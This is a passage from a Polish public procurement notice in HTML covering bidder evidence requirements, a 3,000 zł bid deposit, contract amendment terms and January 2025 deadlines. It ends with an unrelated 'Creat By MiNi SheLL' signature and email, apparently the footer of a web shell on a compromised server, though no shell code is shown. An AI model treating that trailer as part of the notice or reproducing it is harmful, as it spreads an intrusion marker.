wspólnie <br/>ubiegających się o udzielenie zamówienia. Potwierdza ono brak podstaw <br/>wykluczenia oraz spełnienie warunków udziału w postępowaniu, w zakresie w <br/>jakim każdy z Wykonawców wykazuje ich spełnienie.<br/>3. Wykonawca, w przypadku polegania na zdolnościach podmiotów udostępniających <br/>zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt 1, także <br/>oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w <br/>postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>4. Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem <br/>najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej <br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych <br/>na dzień złożenia podmiotowych środków dowodowych, o których mowa poniżej: <br/>1)w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w <br/>postępowaniu, o których mowa w Rozdziale VI pkt 1 ppkt 4 SWZ - wykazu usług<br/>wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również <br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności <br/>12<br/>jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat <br/>wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane <br/>lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy <br/>lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, <br/>o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, <br/>na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń <br/>powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn <br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie <br/>wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal <br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte <br/>wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; wzór <br/>wykazu stanowi załącznik nr 3 do SWZ.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług <br/>wykonywanych wspólnie z innymi Wykonawcami, wykaz, o którym mowa <br/>powyżej,dotyczyusług,wktórychwykonaniuWykonawca tenbezpośrednio <br/>uczestniczył.<br/>2)wykazu sprzętu niezbędnego do realizacji umowy w rodzaju i ilości podanej przez <br/>Zamawiającego - wzór wykazu stanowi załącznik nr 3 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w wysokości: 3 000,00 zł. <br/>2. Wadium może być wnoszone w jednej lub kilku formach, zgodnie z art. 97 ust. 7 ustawy Pzp. Dokument w formie poręczenia lub gwarancji winien zawierać zobowiązanie gwaranta do wypłaty wadium na pierwsze pisemne żądanie Zamawiającego, w sposób nieodwołalny i bezwarunkowy, jeśli nastąpi co najmniej jedna z okoliczności opisana w art. 98 ust. 6 ustawy Pzp. <br/>3. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w pkt 4 ppkt 2 i 3 oraz pkt 5 poniżej. <br/>4. Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności: <br/>1) upływu terminu związania ofertą, <br/>2) zawarcia umowy w sprawie zamówienia publicznego, <br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji, gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia. <br/>5. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia <br/>wniosku zwraca wadium Wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert, <br/>2) którego oferta została odrzucona, <br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, <br/>4) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia. <br/>Szczegółowy opis znajduje się w części IX SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia –<br/>20<br/>dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o <br/>udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w <br/>sprawie niniejszego zamówienia publicznego – jeśli dotyczy, <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany i uzupełnienia Umowy mogą nastąpić tylko za zgodą Stron, w formie aneksu w formie pisemnej pod rygorem nieważności.<br/>2.	Zamawiający przewiduje możliwość zmiany postanowień Umowy w przypadku wystąpienia okoliczności wskazanych w art. 455 ust. 1 pkt 2 - 4 oraz ust. 2 ustawy Pzp.<br/>3.	Zgodnie z art. 455 ust. 1 pkt 1 ustawy Pzp Zamawiający przewiduje możliwość zmiany postanowień Umowy w następujących przypadkach:<br/>a.	wystąpienie zdarzenia nieprzewidywalnego, losowego, pozostającego poza kontrolą Stron, które nastąpiło po podpisaniu Umowy, a powodującego<br/>niemożliwość wywiązania się z Umowy w jej obecnym brzmieniu, w szczególności z uwagi na wystąpienie siły wyższej, rozumianej jako<br/>nadzwyczajne przypadki lub zdarzenia, które są poza kontrolą i są niezawinione przez żadną ze Stron, których nie można przewidzieć ani uniknąć, a które zaistnieją po podpisaniu Umowy i staną się przeszkodą w realizacji zobowiązań umownych, w szczególności takich jak powódź, pożar i inne klęski żywiołowe,<br/>b.	zmiana podmiotu, o którym mowa w art. 118 ust. 1 ustawy Pzp na inny, pod warunkiem udowodnienia Zamawiającemu, że nowy podmiot spełnia warunki określone w Postępowaniu, zgodnie z wymaganiami określonymi w SWZ dla Postępowania,<br/>c.	zmiana obowiązujących przepisów prawa polskiego lub unijnego, które<br/>nastąpiła w trakcie realizacji Umowy, jeżeli konieczne będzie dostosowanie<br/>postanowień Umowy do nowego stanu prawnego (np. zmiana stawki podatku<br/>VAT).<br/>Szczegółowy opis znajduje się w §11 załącznika numer 5 tj. wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-01-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-01-21 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-02-19</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com